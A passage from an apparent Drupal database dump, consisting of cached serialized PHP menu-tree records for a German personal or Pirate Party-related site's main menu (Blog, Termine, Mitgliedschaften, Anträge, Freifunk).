\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"6\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"391\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:4:{i:4;a:1:{i:350;R:94;}i:5;a:1:{i:351;R:140;}i:6;a:1:{i:390;R:186;}i:7;a:1:{i:391;R:232;}}}',0,1444940233,1),('links:main-menu:tree-data:en:484546dcf5b33ae3598517bd53bcfd186195efd1497b85dcd320e7c37740d408','a:2:{s:4:\"tree\";a:6:{i:347;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"347\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:32:\"https://www.ollital.de/wordpress\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"347\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:348;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"348\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:46:\"http://wiki.piratenpartei.de/Benutzer:Darkwing\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:5:\"Pirat\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"348\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:350;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"350\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/4\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:7:\"Termine\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"3\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"350\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:351;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"351\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/5\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:16:\"Mitgliedschaften\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"4\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"351\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:390;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"390\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/6\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Anträge\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"390\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:391;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"391\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/7\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Freifunk\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"6\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"391\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:4:{i:4;a:1:{i:350;R:94;}i:5;a:1:{i:351;R:140;}i:6;a:1:{i:390;R:186;}i:7;a:1:{i:391;R:232;}}}',0,1444940212,1),('links:main-menu:tree-data:en:4e384a0b3d67f85638588ebfa534e101bde32ff25bcb1b8c7489cde2d68cc5a0','a:2:{s:4:\"tree\";a:6:{i:347;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"347\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:32:\"https://www.ollital.de/wordpress\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"347\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:348;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"348\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:46:\"http://wiki.piratenpartei.de/Benutzer:Darkwing\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:5:\"Pirat\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"348\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:350;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"350\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/4\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:7:\"Termine\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"3\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"350\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:351;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"351\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/5\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:16:\"Mitgliedschaften\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"4\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"351\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:390;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"390\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/6\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Anträge\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"390\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:391;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"391\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/7\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Freifunk\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"6\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"391\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:4:{i:4;a:1:{i:350;R:94;}i:5;a:1:{i:351;R:140;}i:6;a:1:{i:390;R:186;}i:7;a:1:{i:391;R:232;}}}',0,1444940233,1),('links:main-menu:tree-data:en:6b693d9aa44f3d3cd406fc6a5706298120a412defdc97f00998e8683d6efb7d3','a:2:{s:4:\"tree\";a:6:{i:347;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"347\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:32:\"https://www.ollital.de/wordpress\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"347\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:348;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"348\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:46:\"http://wiki.piratenpartei.de/Benutzer:Darkwing\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:5:\"Pirat\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"348\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:350;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"350\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/4\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:7:\"Termine\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"3\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"350\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"